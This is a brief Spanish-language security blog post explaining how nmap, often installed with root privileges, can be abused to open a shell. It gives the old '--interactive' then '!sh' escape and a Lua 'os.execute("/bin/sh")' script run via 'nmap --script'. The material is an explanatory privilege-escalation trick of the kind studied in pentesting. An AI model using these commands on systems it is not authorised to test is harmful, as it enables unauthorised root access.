> Nmap, ¿solo para realizar escaneos?

Vamos a ver un truco (o dos) para abrir una shell usando nmap.

Nmap es una aplicación utilizada no solo por pentesters o hackers, sino también por administradores de sistemas, por lo que es fácil que nos la encontremos instalada, y además con privilegios de root, pero… ¿sabes que se puede abrir una shell usando nmap?Si está instalada una versión antigua (hasta la 5.2) venía con un modo interactivo:

​#nmap –interactive
#!sh

Y esto abre una shell:

¿Y para versiones más actuales? Pues usamos nuestros conocimientos de bash, podemos crear un script como el siguiente:

​TF=$(mktemp)
echo ‘os.execute(«/bin/sh»)’ > $TF
nmap –script=$TF​

Asignarle permisos y ejecutarlo:

Y listo, ya tenemos nuestra Shell, podemos hacer uso de herramientas no destinadas para ello para acceder a ficheros y explorar el sistema operativo objetivo.

Always Learning.

Recursos gratuitos en tu email

security theater

Security theater: cuando sentirse seguro no significa estar seguro

Ingeniería social focus

Focus: cuando el truco no está en esconderse, sino en conseguir que mires a otro lado

Atrápame si puedes: una película de hackers… sin un solo ordenador

Resumen de privacidad

Esta web utiliza cookies para que podamos ofrecerte la mejor experiencia de usuario posible. La información de las cookies se almacena en tu navegador y realiza funciones tales como reconocerte cuando vuelves a nuestra web o ayudar a nuestro equipo a comprender qué secciones de la web encuentras más interesantes y útiles.